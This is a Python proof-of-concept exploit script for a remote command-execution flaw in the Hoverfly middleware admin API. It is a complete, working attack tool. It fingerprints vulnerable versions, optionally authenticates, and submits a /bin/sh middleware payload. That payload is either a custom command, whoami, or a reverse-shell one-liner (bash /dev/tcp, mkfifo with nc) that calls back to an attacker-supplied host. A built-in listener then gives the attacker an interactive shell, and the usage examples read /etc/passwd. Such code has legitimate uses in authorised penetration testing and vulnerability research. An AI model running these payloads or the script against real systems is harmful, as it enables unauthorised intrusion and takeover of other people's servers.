#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: Krishna Agarwal (https://kr1shna4garwal.com)
# SPDX-License-Identifier: MIT
"""Proof of concept for the Hoverfly middleware command-execution issue.

The script checks the version reported by a Hoverfly admin API, optionally
authenticates, and then submits a middleware definition to
``/api/v2/hoverfly/middleware``. Intended for use against systems you are
authorised to test.
"""

import argparse
import json
import logging
import re
import signal
import socket
import sys
import threading
import time
from typing import Optional, Dict, Tuple

import requests
import urllib3
from colorama import Fore, Style, init
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

# Initialize colorama for cross-platform color support
init(autoreset=True)

# Disable SSL warnings for testing environments
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Kept in a raw string: the art is full of backslashes that would otherwise
# be parsed as (invalid) escape sequences and trigger SyntaxWarning on 3.12+.
_BANNER_ART = r"""
 _  _                 ___ _        __  ____      _______      ___  _
| || |_____ _____ _ _| __| |_  _  |  \/  \ \    / / _ \ \    / / \| |
| __ / _ \ V / -_) '_| _|| | || | | |\/| |\ \/\/ /|  _/\ \/\/ /| .` |
|_||_\___/\_/\___|_| |_| |_|\_, | |_|  |_(_)_/\_(_)_|   \_/\_/ |_|\_|
                            |__/
""".strip("\n")


class C:
    """Colour/style prefixes used for console output."""

    HEADER = Fore.CYAN + Style.BRIGHT
    AUTHOR = Fore.RED + Style.BRIGHT
    SUCCESS = Fore.GREEN + Style.BRIGHT
    WARNING = Fore.YELLOW + Style.BRIGHT
    ERROR = Fore.RED + Style.BRIGHT
    INFO = Fore.BLUE + Style.BRIGHT
    BOLD = Style.BRIGHT
    RESET = Style.RESET_ALL


class Logger:
    """Console logger that prints coloured, tagged messages.

    Every message is written with ``print``. When ``verbose`` is set the
    message is additionally routed through the ``logging`` module, whose
    console handler also targets stdout, so verbose runs show each message
    twice (once tagged, once timestamped).
    """

    def __init__(self, verbose: bool = False, log_file: Optional[str] = None):
        self.verbose = verbose
        self.log_file = log_file
        self.setup_logging()

    def setup_logging(self):
        """Configure the ``logging`` module (console, plus file if requested)."""
        log_format = '%(asctime)s - %(levelname)s - %(message)s'
        level = logging.DEBUG if self.verbose else logging.INFO

        handlers = []

        # Console handler
        console_handler = logging.StreamHandler(sys.stdout)
        console_handler.setLevel(level)
        handlers.append(console_handler)

        # File handler if specified
        if self.log_file:
            file_handler = logging.FileHandler(self.log_file)
            file_handler.setLevel(logging.DEBUG)
            file_handler.setFormatter(logging.Formatter(log_format))
            handlers.append(file_handler)

        logging.basicConfig(
            level=level,
            format=log_format,
            handlers=handlers
        )
        self.logger = logging.getLogger(__name__)

    def info(self, message: str):
        """Log info message with color"""
        print(f"{C.INFO}[?]{C.RESET} {message}")
        if self.verbose:
            self.logger.info(message)

    def success(self, message: str):
        """Log success message with color"""
        print(f"{C.SUCCESS}[+]{C.RESET} {message}")
        if self.verbose:
            self.logger.info(f"SUCCESS: {message}")

    def warning(self, message: str):
        """Log warning message with color"""
        print(f"{C.WARNING}[WARNING]{C.RESET} {message}")
        if self.verbose:
            self.logger.warning(message)

    def error(self, message: str):
        """Log error message with color"""
        print(f"{C.ERROR}[!]{C.RESET} {message}")
        if self.verbose:
            self.logger.error(message)

    def debug(self, message: str):
        """Log debug message (emitted only in verbose mode)"""
        if self.verbose:
            print(f"{C.HEADER}[%]{C.RESET} {message}")
            self.logger.debug(message)


class InputValidator:
    """Input validation utilities"""

    # Compiled once at class creation instead of on every validate_host call.
    _IP_PATTERN = re.compile(
        r'^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}'
        r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'
    )
    _HOSTNAME_PATTERN = re.compile(
        r'^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)*[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$'
    )

    @staticmethod
    def validate_host(host: str) -> bool:
        """Return True if *host* looks like an IPv4 address or a hostname.

        A leading ``scheme://`` and anything from the first ``/`` onwards are
        ignored for the purpose of the check; the caller's string is not
        modified.
        """
        if not host:
            return False

        # Remove protocol if present
        if '://' in host:
            host = host.split('://', 1)[1]

        # Remove path if present
        host = host.split('/', 1)[0]

        # Validate IP address or hostname
        return bool(
            InputValidator._IP_PATTERN.match(host)
            or InputValidator._HOSTNAME_PATTERN.match(host)
            or host == 'localhost'
        )

    @staticmethod
    def validate_port(port: int) -> bool:
        """Return True if *port* is within 1..65535."""
        return 1 <= port <= 65535

    @staticmethod
    def validate_credentials(username: str, password: str) -> bool:
        """Return True if both values are non-empty after stripping whitespace."""
        return bool(
            username and password and username.strip() and password.strip()
        )


class ReverseShellHandler:
    """TCP listener that accepts one inbound connection and relays a console."""

    def __init__(self, lhost: str, lport: int, logger: Logger):
        self.lhost = lhost
        self.lport = lport
        self.logger = logger
        self.server_socket = None
        self.client_socket = None
        self.running = False

    def start_listener(self) -> bool:
        """Bind and listen on ``lhost:lport``; return False on any failure."""
        try:
            self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.server_socket.bind((self.lhost, self.lport))
            self.server_socket.listen(1)
            self.server_socket.settimeout(30)  # 30 second timeout

            self.logger.info(f"Listening for reverse shell on {self.lhost}:{self.lport}")
            return True
        except Exception as e:
            self.logger.error(f"Failed to start listener: {e}")
            return False

    def wforconn(self) -> bool:
        """Wait for one inbound connection; return True once it is accepted."""
        try:
            if not self.server_socket:
                return False

            self.logger.info("Waiting for reverse shell connection...")
            self.client_socket, addr = self.server_socket.accept()
            self.logger.success(f"Reverse shell connected from {addr[0]}:{addr[1]}")
            self.running = True
            return True
        except socket.timeout:
            self.logger.error("Timeout waiting for reverse shell connection")
            return False
        except Exception as e:
            self.logger.error(f"Error waiting for connection: {e}")
            return False

    def interactive_shell(self):
        """Handle interactive shell session"""
        if not self.client_socket:
            return

        self.logger.success("Starting interactive shell session...")
        print(f"{C.SUCCESS}[SHELL]{C.RESET} Type 'exit' to quit the shell")

        def receive_data():
            """Receive data from remote shell"""
            while self.running:
                try:
                    if not self.client_socket:
                        break
                    data = self.client_socket.recv(4096)
                    if not data:
                        break
                    print(data.decode('utf-8', errors='ignore'), end='')
                except (OSError, ValueError):
                    # Socket closed/reset, or stdout could not take the text.
                    break

        # Start receiving thread
        recv_thread = threading.Thread(target=receive_data, daemon=True)
        recv_thread.start()

        try:
            while self.running:
                try:
                    command = input()
                    if command.lower() in ['exit', 'quit']:
                        break
                    self.client_socket.send((command + '\n').encode())
                except (KeyboardInterrupt, EOFError, OSError, ValueError):
                    # Interrupt, closed stdin, or a dead socket ends the session.
                    break
        finally:
            self.cleanup()

    def cleanup(self):
        """Stop the session and close both sockets, ignoring close errors."""
        self.running = False
        for sock in (self.client_socket, self.server_socket):
            if sock:
                try:
                    sock.close()
                except OSError:
                    pass


class HoverflyMWPwn:
    """The main class: drives the check / authenticate / submit flow."""

    def __init__(self, args: argparse.Namespace):
        self.args = args
        self.logger = Logger(verbose=args.verbose)
        self.validator = InputValidator()

        # Validate inputs before anything is derived from them
        self._validate_inputs()

        self.session = self._create_session()
        self.base_url = self._build_base_url()
        self.token = None

    def _validate_inputs(self):
        """Validate all user inputs; exits the process with status 1 on failure."""
        if not self.validator.validate_host(self.args.host):
            self.logger.error("Invalid host format")
            sys.exit(1)

        if not self.validator.validate_port(self.args.port):
            self.logger.error("Invalid port number")
            sys.exit(1)

        if self.args.username and self.args.password:
            if not self.validator.validate_credentials(self.args.username, self.args.password):
                self.logger.error("Invalid credentials format")
                sys.exit(1)

        if self.args.local_host and self.args.local_port:
            if not self.validator.validate_host(self.args.local_host):
                self.logger.error("Invalid local host format")
                sys.exit(1)

            if not self.validator.validate_port(self.args.local_port):
                self.logger.error("Invalid local port number")
                sys.exit(1)

    def _create_session(self) -> requests.Session:
        """Build a ``requests`` session with retries and default headers."""
        session = requests.Session()

        # Retry strategy
        retry_strategy = Retry(
            total=3,
            backoff_factor=1,
            status_forcelist=[429, 500, 502, 503, 504],
        )

        adapter = HTTPAdapter(max_retries=retry_strategy)
        session.mount("http://", adapter)
        session.mount("https://", adapter)

        # Security headers
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Language': 'en-US,en;q=0.9',
            'Accept-Encoding': 'gzip, deflate, br',
            'Connection': 'keep-alive',
            'sec-ch-ua': '"Not)A;Brand";v="8", "Chromium";v="138"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"macOS"',
        })

        return session

    def _build_base_url(self) -> str:
        """Build base URL from host and port.

        HTTPS is selected for port 443, HTTP otherwise. ``--skip-ssl`` only
        controls certificate verification (the ``verify=`` argument on each
        request), so it must not influence the scheme chosen here.
        """
        protocol = "https" if self.args.port == 443 else "http"
        return f"{protocol}://{self.args.host}:{self.args.port}"

    def cool_banner(self):
        """Print the start-up banner including the target URL."""
        banner = f"""
{C.HEADER}
{_BANNER_ART}
{C.RESET}
{C.INFO}Hoverfly Middleware RCE Vulnerability Proof Of Concept{C.RESET}\n
Author:{C.AUTHOR} Krishna Agarwal (https://github.com/kr1shna4garwal){C.RESET}\n
{C.INFO}Target: {C.BOLD}{self.base_url}{C.RESET}
"""
        print(banner)

    def check_target_reachability(self) -> bool:
        """Check if target is reachable.

        Any HTTP response (whatever its status code) counts as reachable;
        only transport-level failures return False.
        """
        self.logger.info("Checking target reachability...")

        try:
            # Test basic connectivity
            self.session.get(
                f"{self.base_url}/api/v2/hoverfly/version",
                timeout=10,
                verify=not self.args.skip_ssl
            )
            self.logger.success("Target is reachable")
            return True
        except requests.exceptions.ConnectTimeout:
            self.logger.error("Connection timeout - target may be unreachable")
            return False
        except requests.exceptions.ConnectionError:
            self.logger.error("Connection error - target is unreachable")
            return False
        except Exception as e:
            self.logger.error(f"Unexpected error checking reachability: {e}")
            return False

    def check_version(self) -> Tuple[bool, bool]:
        """Check product version and authentication status.

        Returns:
            ``(is_vulnerable, requires_auth)``. A 401 yields ``(False, True)``
            because the version cannot be read before authenticating.
        """
        self.logger.info("Checking product version...")

        try:
            response = self.session.get(
                f"{self.base_url}/api/v2/hoverfly/version",
                timeout=10,
                verify=not self.args.skip_ssl
            )

            if response.status_code == 401:
                self.logger.info("Target requires authentication")
                return False, True  # Not vulnerable check done, auth required
            elif response.status_code == 200:
                try:
                    data = response.json()
                    version = data.get('version', '')
                    self.logger.info(f"Detected version: {version}")

                    # Check if version is vulnerable (v1.11.2 or older)
                    if self._is_vulnerable_version(version):
                        self.logger.success(f"Target is running vulnerable version: {version}")
                        return True, False  # Vulnerable, no auth required
                    else:
                        self.logger.warning(f"Target version {version} may not be vulnerable")
                        return False, False
                except json.JSONDecodeError:
                    self.logger.error("Invalid JSON response from version endpoint")
                    return False, False
            else:
                self.logger.error(f"Unexpected status code: {response.status_code}")
                return False, False

        except Exception as e:
            self.logger.error(f"Error checking version: {e}")
            return False, False

    def _is_vulnerable_version(self, version: str) -> bool:
        """Return True if *version* is v1.11.2 or older.

        An optional leading ``v`` is ignored. Components are compared
        numerically with missing components treated as zero, so ``1.11`` is
        read as ``1.11.0``. A version that cannot be parsed as dot-separated
        integers is reported as vulnerable (with a warning).
        """
        # Remove 'v' prefix if present
        if version.startswith('v'):
            version = version[1:]

        try:
            version_parts = [int(x) for x in version.split('.')]
        except ValueError:
            self.logger.warning(f"Could not parse version: {version}")
            return True  # Assume vulnerable if we can't parse

        vulnerable_parts = [1, 11, 2]  # v1.11.2

        # Zero-pad both sides to the same length so that list comparison is a
        # plain component-wise numeric comparison.
        width = max(len(version_parts), len(vulnerable_parts))
        current = version_parts + [0] * (width - len(version_parts))
        ceiling = vulnerable_parts + [0] * (width - len(vulnerable_parts))
        return current <= ceiling

    def authenticate(self) -> bool:
        """Authenticate and obtain session token.

        On success the token is stored on ``self.token`` and added to the
        session as a ``Bearer`` Authorization header.
        """
        if not self.args.username or not self.args.password:
            self.logger.error("Username and password required for authentication")
            return False

        self.logger.info("Attempting authentication...")

        try:
            auth_data = {
                "username": self.args.username,
                "password": self.args.password
            }

            # Update headers for authentication request
            headers = {
                'Content-Type': 'application/json',
                'Origin': self.base_url,
                'Referer': f"{self.base_url}/login",
                'Sec-Fetch-Site': 'same-origin',
                'Sec-Fetch-Mode': 'cors',
                'Sec-Fetch-Dest': 'empty',
            }

            response = self.session.post(
                f"{self.base_url}/api/token-auth",
                json=auth_data,
                headers=headers,
                timeout=10,
                verify=not self.args.skip_ssl
            )

            if response.status_code == 200:
                try:
                    data = response.json()
                    self.token = data.get('token')  # here we get the JWT token (.token)

                    if self.token:
                        self.logger.success("Authentication successful")
                        # Update session headers with token
                        self.session.headers.update({
                            'Authorization': f'Bearer {self.token}'
                        })
                        return True
                    else:
                        self.logger.error("No token in authentication response")
                        return False
                except json.JSONDecodeError:
                    self.logger.error("Invalid JSON in authentication response")
                    return False
            else:
                self.logger.error(f"Authentication failed with status: {response.status_code}")
                return False

        except Exception as e:
            self.logger.error(f"Authentication error: {e}")
            return False

    def verify_authenticated_access(self) -> bool:
        """Re-read the version endpoint with the token and check the version.

        Returns True only if the request succeeds and the reported version is
        considered vulnerable.
        """
        if not self.token:
            return False

        self.logger.info("Verifying authenticated access...")

        try:
            headers = {
                'Referer': f"{self.base_url}/login",
                'Sec-Fetch-Site': 'same-origin',
                'Sec-Fetch-Mode': 'cors',
                'Sec-Fetch-Dest': 'empty',
            }

            response = self.session.get(
                f"{self.base_url}/api/v2/hoverfly/version",
                headers=headers,
                timeout=10,
                verify=not self.args.skip_ssl
            )

            if response.status_code == 200:
                try:
                    data = response.json()
                    version = data.get('version', '')
                    self.logger.success(f"Authenticated access verified. Version: {version}")
                    return self._is_vulnerable_version(version)
                except json.JSONDecodeError:
                    self.logger.error("Invalid JSON in authenticated version response")
                    return False
            else:
                self.logger.error(f"Authenticated access failed: {response.status_code}")
                return False

        except Exception as e:
            self.logger.error(f"Error verifying authenticated access: {e}")
            return False

    def generate_payload(self) -> Dict[str, str]:
        """Build the middleware definition to submit.

        Precedence: ``--command`` if given, else the reverse-shell script when
        both local host and port are set, else a default ``whoami``.
        """
        if self.args.command:
            # Custom command
            payload = {
                "binary": "/bin/sh",
                "script": self.args.command
            }
            self.logger.info(f"Using custom command: {self.args.command}")
        elif self.args.local_host and self.args.local_port:
            # Reverse shell payload
            reverse_shell_cmd = self._generate_reverse_shell_payload()
            payload = {
                "binary": "/bin/sh",
                "script": reverse_shell_cmd
            }
            self.logger.info(f"Using reverse shell payload: {self.args.local_host}:{self.args.local_port}")
        else:
            # Default reconnaissance command
            payload = {
                "binary": "/bin/sh",
                "script": "whoami"
            }
            self.logger.info("Using default reconnaissance payload")

        return payload

    def _generate_reverse_shell_payload(self) -> str:
        """Generate reverse shell payload"""
        payloads = [
            f"bash -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1",
            f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {self.args.local_host} {self.args.local_port} >/tmp/f &",
            f"bash -c 'bash -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1'",
            f"sh -i >& /dev/tcp/{self.args.local_host}/{self.args.local_port} 0>&1",
            f"nc -e /bin/sh {self.args.local_host} {self.args.local_port}",
            f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {self.args.local_host} {self.args.local_port} >/tmp/f",
        ]

        # use #1 as this is the best
        return payloads[1]

    def exploit(self) -> bool:
        """Execute the exploitation.

        Submits the payload with a PUT to the middleware endpoint. A 422
        response is treated as the expected outcome; any other status is
        reported as a failure. The listener (if one was started) is always
        cleaned up before returning.
        """
        self.logger.info("Preparing exploitation...")

        # Generate payload
        payload = self.generate_payload()

        # Start reverse shell listener if needed
        shell_handler = None
        shell_thread = None

        if self.args.local_host and self.args.local_port and not self.args.command:
            shell_handler = ReverseShellHandler(
                self.args.local_host,
                self.args.local_port,
                self.logger
            )

            if not shell_handler.start_listener():
                return False

            # Start listener in background thread
            def wait_for_shell():
                if shell_handler and shell_handler.wforconn():
                    time.sleep(1)  # Give time for connection to establish
                    shell_handler.interactive_shell()

            shell_thread = threading.Thread(target=wait_for_shell, daemon=True)
            shell_thread.start()

        # Execute exploitation
        self.logger.info("Sending exploitation payload...")

        try:
            headers = {
                'Content-Type': 'application/json',
                'Referer': f"{self.base_url}/dashboard",
                'Sec-Fetch-Site': 'same-origin',
                'Sec-Fetch-Mode': 'cors',
                'Sec-Fetch-Dest': 'empty',
            }

            response = self.session.put(
                f"{self.base_url}/api/v2/hoverfly/middleware",
                json=payload,
                headers=headers,
                timeout=30,
                verify=not self.args.skip_ssl
            )

            self.logger.debug(f"Response status: {response.status_code}")
            self.logger.debug(f"Response headers: {dict(response.headers)}")

            if response.status_code == 422:
                # Expected response for successful exploitation
                response_text = response.text
                self.logger.debug(f"Response body: {response_text}")

                if "STDOUT:" in response_text:
                    # Extract command output
                    stdout_start = response_text.find("STDOUT:")
                    if stdout_start != -1:
                        stdout_content = response_text[stdout_start + 8:].strip()
                        if stdout_content:
                            self.logger.success("PWNED SUCCESSFUL :) 🎉")
                            print(f"\n{C.SUCCESS}[COMMAND OUTPUT]{C.RESET}")
                            print(f"{C.BOLD}{stdout_content}{C.RESET}\n")

                            # If reverse shell, wait for connection
                            if shell_handler and shell_thread:
                                self.logger.info("Waiting for reverse shell connection...")
                                shell_thread.join(timeout=10)

                                if shell_handler.running:
                                    return True
                                else:
                                    self.logger.warning("Reverse shell connection not established")
                                    return True  # Still consider successful since command executed

                            return True
                        else:
                            self.logger.warning("Command executed but no output received")
                            return True

                self.logger.success("Pwning payload sent successfully")
                self.logger.info("Check your reverse shell listener for connection")

                if shell_handler and shell_thread:
                    shell_thread.join(timeout=10)

                return True

            else:
                self.logger.error(f"Unexpected response status: {response.status_code}")
                self.logger.debug(f"Response: {response.text}")
                return False

        except Exception as e:
            self.logger.error(f"Pwning failed: {e}")
            return False
        finally:
            if shell_handler:
                shell_handler.cleanup()

    def run(self) -> bool:
        """Main execution flow: reachability, version/auth checks, then exploit."""
        self.cool_banner()

        # Check target reachability
        if not self.check_target_reachability():
            return False

        # Check version and authentication requirements
        is_vulnerable, requires_auth = self.check_version()

        if requires_auth:
            if not self.args.username or not self.args.password:
                self.logger.error("Target requires authentication but no credentials provided")
                self.logger.info("Use -U/--username and -p/--password flags")
                return False

            # Authenticate
            if not self.authenticate():
                return False

            # Verify authenticated access and check vulnerability
            if not self.verify_authenticated_access():
                self.logger.error("Target does not appear to be vulnerable")
                return False

        elif not is_vulnerable:
            self.logger.error("Target does not appear to be vulnerable")
            return False

        # Execute exploitation
        self.logger.info("Target confirmed vulnerable - proceeding with exploitation")
        return self.exploit()


def signal_handler(signum, frame):
    """Handle Ctrl+C gracefully"""
    print(f"\n{C.WARNING}[-]{C.RESET} Pwning interrupted by user")
    sys.exit(0)


def main():
    """Parse command-line arguments, run the PoC and set the exit status."""
    signal.signal(signal.SIGINT, signal_handler)

    parser = argparse.ArgumentParser(
        description="Hoverfly Middleware RCE Proof of concept",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic unauthenticated exploitation
  python3 hoverfly_poc.py -H localhost -P 8888

  # Authenticated exploitation
  python3 hoverfly_poc.py -H localhost -P 8888 -U admin -p password

  # Reverse shell exploitation
  python3 hoverfly_poc.py -H target.com -P 8888 --lhost 10.0.0.1 --lport 4444

  # Custom command execution
  python3 hoverfly_poc.py -H target.com -P 8888 -c "cat /etc/passwd"

  # HTTPS target with custom port
  python3 hoverfly_poc.py -H secure.target.com -P 9443 -U admin -p admin
        """
    )

    # Required arguments
    parser.add_argument('-H', '--host', required=True,
                        help='Target host (IP address or hostname)')

    # Optional arguments
    parser.add_argument('-P', '--port', type=int, default=8888,
                        help='Target port (default: 8888)')
    parser.add_argument('-U', '--username',
                        help='Username for authentication')
    parser.add_argument('-p', '--password',
                        help='Password for authentication')
    parser.add_argument('--lhost', '--local-host', dest='local_host',
                        help='Local host for reverse shell')
    parser.add_argument('--lport', '--local-port', dest='local_port', type=int,
                        help='Local port for reverse shell')
    parser.add_argument('-c', '--command',
                        help='Custom command to execute')
    parser.add_argument('-k', '--skip-ssl', action='store_true',
                        help='Skip SSL certificate verification')
    parser.add_argument('-V', '--verbose', action='store_true',
                        help='Enable verbose output')
    parser.add_argument('--version', action='version', version='v1.0.0',)

    args = parser.parse_args()

    # Validate argument combinations
    if args.local_host and not args.local_port:
        parser.error("--lport is required when --lhost is specified")

    if args.local_port and not args.local_host:
        parser.error("--lhost is required when --lport is specified")

    if args.command and (args.local_host or args.local_port):
        parser.error("Cannot use --command with reverse shell options")

    try:
        # Create and run exploit
        exploit = HoverflyMWPwn(args)
        success = exploit.run()

        if success:
            print(f"\n{C.SUCCESS}[+]{C.RESET} Pwning completed successfully!")
            sys.exit(0)
        else:
            print(f"\n{C.ERROR}[!]{C.RESET} Pwning failed")
            sys.exit(1)

    except KeyboardInterrupt:
        print(f"\n{C.WARNING}[!]{C.RESET} Pwning interrupted")
        sys.exit(1)
    except Exception as e:
        print(f"\n{C.ERROR}[!]{C.RESET} {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()